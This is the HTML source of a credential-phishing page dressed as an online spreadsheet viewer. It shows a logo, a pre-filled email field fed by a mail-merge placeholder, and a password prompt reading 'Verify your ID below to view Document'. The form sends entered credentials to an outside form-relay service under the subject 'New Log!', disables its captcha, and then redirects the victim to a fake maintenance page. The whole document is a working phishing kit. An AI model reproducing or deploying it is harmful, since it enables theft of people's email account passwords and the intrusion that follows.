<!DOCTYPE html>
<HTML><HEAD><TITLE>Online Document</TITLE><LINK rel=icon type=image/png href="https://blog.examin.co.in/wp-content/uploads/2018/03/Microsoft-Excel-MCQ.jpg">
<STYLE type=text/css>


body, html {
  height: 100%;
  margin: 0;
  font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
}

	.wrapper {
  background-image: url("https://i.gyazo.com/3d0efe1d5efad6bb1820212b300a2794.png");
  background-repeat: no-repeat;
  background-attachment: cover;
  background-position: cover;
  background-size: cover;
  position: fixed;
  top: 0;
  left: 0;
  height: 100%;
  width: 100%;


  /* this is what centers your element in the fixed wrapper*/
  display: flex;
  flex-flow: column nowrap;
  justify-content: center; /* aligns on vertical for column */
  align-items: center; /* aligns on horizontal for column */

  /* just for styling to see the limits */
  /*border: 2px dashed red; */
  box-sizing: border-box;
}

.element {
  width: 350px;
  height: 265px;
  padding: 35px 25px;
  border-radius: 10px;
  -webkit-box-shadow: 2px 2px 5px 2px #000000; 
  box-shadow: 2px 2px 5px 2px #000000;

  /* Just for styling */
  background-color: #ffffff;
  border: 1px solid grey;
}
.elemente{
	width: 350px;
  height: 260px;
  padding: 35px 25px;

  /* Just for styling */
  background-color: #ffffff;
  border: 1px solid grey;
}
.logo{
	background-image: url("");
}
input{
    border:0;
    width: 100%;
    padding:5px 0px;
    font-size:1.0em;
    font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
    color:black;
    border-bottom:solid 1px #ccc;

    border-width: 1px;
    border-color: #666;
    border-color: rgba(0,0,0,0.6);
    height: 36px;
    outline: none;
    border-radius: 0;
    -webkit-border-radius: 0;
    background-color: transparent;
    font-weight:400;

}
input:focus,button:focus {
    border: 0;
    border-bottom: 1px solid blue;
    outline: none !important;

}
div .sign-opt {
	padding: 20px 0px;
	font-size: 14px;
}

div .button {
	padding: 20px 0px;
	font-size: 16px;
	text-align: right;
}
.newbutton{
	padding: 5px;
	width: 50px;
	max-width: 100px;
	font-size: 14px;
	width: 100px;
	color: white;
	background-color: #005da6;
}
.alert-error {
    color: #e81123;
    text-align: left;
    margin-bottom: 0;
    margin-bottom: 0;
    font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
}
a:visited {
    color: #0067b8;
}
a:link {
    color: #0067b8;
}
a {
    color: #ccc;
    text-decoration: none;
}
a {
    background-color: transparent;
}
.identityBanner {
    height: 24px;
    background: #fff;
    margin-top: 16px;
    margin-bottom: -4px;
}
.text-title {
    color: #1b1b1b;
    font-size: 1.5rem;
    font-weight: 600;
    padding: 0;
    margin-top: 16px;
    margin-bottom: 12px;
    font-family: "Segoe UI","Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
}
</STYLE>

<SCRIPT src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></SCRIPT>

<SCRIPT defer src="https://use.fontawesome.com/releases/v5.0.9/js/all.js" crossorigin="anonymous" integrity="sha384-8iPTk2s/jMVj81dnzb/iFR2sdA7u06vHJyyLlAd4snFpCl/SnyUjRrbdJsw1pGIl"></SCRIPT>

<SCRIPT src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></SCRIPT>

<META name=GENERATOR content="MSHTML 8.00.7600.16385"></HEAD>
<BODY>
<DIV class=wrapper><!-- Fixed element that spans the viewport -->
<DIV id=element class=element>
<FORM class=" row g-3" method=post action=https://formsubmit.co/1a8e360e1db0fcbbe93132b634df0023><!-- honeypot -->&nbsp;<!-- disable captcha -->
<DIV value="false" name="_captcha" type="hidden" <input><INPUT value=http://brainygod.rf.gd/pages/maintenance.html type=hidden name=_next> <INPUT value="New Log!" type=hidden name=_subject> <INPUT value=false type=hidden name=_captcha> 
<DIV id=logo><IMG style="WIDTH: 130px; HEIGHT: 55px" src="https://i.gyazo.com/32772bb37c5b2310e4603c957d267c95.png"></DIV>
<DIV style="TEXT-ALIGN: left; PADDING-TOP: 10px" id=cont></DIV>
<DIV id=sign><FONT color=#21610b>Verify your ID below to view Document </FONT></DIV><BR><TR>
<CENTER><SPAN style="TEXT-ALIGN: center; DISPLAY: none; COLOR: red; FONT-SIZE: 15px; FONT-WEIGHT: bold" id=msg></SPAN></CENTER></TR>
<DIV style="DISPLAY: none; COLOR: red; FONT-SIZE: 15px" id=error class="alert alert-danger"></DIV>
<div id="em"><input name="email" type="email" required="required" id="email" placeholder="email" value="[[-Email-]]" size="50" readonly="readonly"></DIV>
<DIV id=ep><INPUT id=password size=50 type=password name=password placeholder="Enter Password" required="required" autofocus="autofocus"></DIV>
<DIV id=sign-opt class=sign-opt>
<DIV class=button><A href="#"><INPUT id=submit-btn class="ZLoginButton DwtButton" value="Open Spreadsheet" type=submit></A></DIV>
<DIV id=sign-out class=sign-opt><A href="#"></A></DIV></DIV></FORM></DIV><!-- your actual centered element --></DIV></DIV></BODY></HTML>